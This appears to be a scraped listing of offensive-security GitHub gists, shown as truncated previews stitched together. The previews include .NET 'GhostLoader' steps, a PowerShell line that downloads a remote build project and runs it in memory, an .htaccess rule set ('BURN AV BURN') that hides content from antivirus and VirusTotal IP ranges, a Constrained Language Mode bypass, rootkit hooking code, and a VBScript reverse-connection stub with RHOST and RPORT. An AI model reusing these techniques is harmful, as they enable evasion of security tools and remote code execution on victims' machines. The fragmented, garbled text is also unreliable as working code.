GhostLoader Steps :)
1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
GhostLoader Steps :)
1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
| //Base64 Raw Decoder | |
| function Base64Decode(str) { | |
| if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
| var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
| var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
| for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
| function Get-PublicKey | |
| { | |
| [OutputType([byte[]])] | |
| PARAM ( | |
| [Uri]$Uri | |
| ) | |
| if (-Not ($uri.Scheme -eq "https")) | |
| { | |
| Write-Error "You can only get keys for https addresses" |
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] | |
| - Launch program (payload) |
| In-memory PowerShell XSLT project build: | |
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj") | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.build(); |
| <?xml version='1.0'?> | |
| <data> | |
| <circle> | |
| <radius>12</radius> | |
| </circle> | |
| <circle> | |
| <radius>37.5</radius> | |
| </circle> | |
| </data> |
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # ForcePoint | |
| RewriteCond expr "-R '208.80.192.0/21'" [OR] | |
| # AWS & Other VT hosts | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] |
| function Remove-ConstrainedLanguageMode { | |
| <# | |
| .Synopsis | |
| Set language mode for a powershell session to 'full'. | |
| .Description | |
| Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' | |
| and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values. | |
| .Example |
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |